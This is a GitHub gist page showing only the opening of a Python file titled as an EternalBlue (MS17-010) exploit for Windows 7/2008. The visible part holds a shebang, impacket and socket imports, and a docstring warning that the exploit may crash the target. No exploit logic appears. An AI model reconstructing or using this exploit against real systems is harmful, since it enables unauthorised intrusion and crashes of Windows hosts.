Skip to content

Instantly share code, notes, and snippets.

View hacknaked's full-sized avatar

Fernando Miranda hacknaked

  • Buenos Aires, AR
View GitHub Profile
@hacknaked
hacknaked / eternalblue7_exploit.py
Created August 24, 2018 17:26 — forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)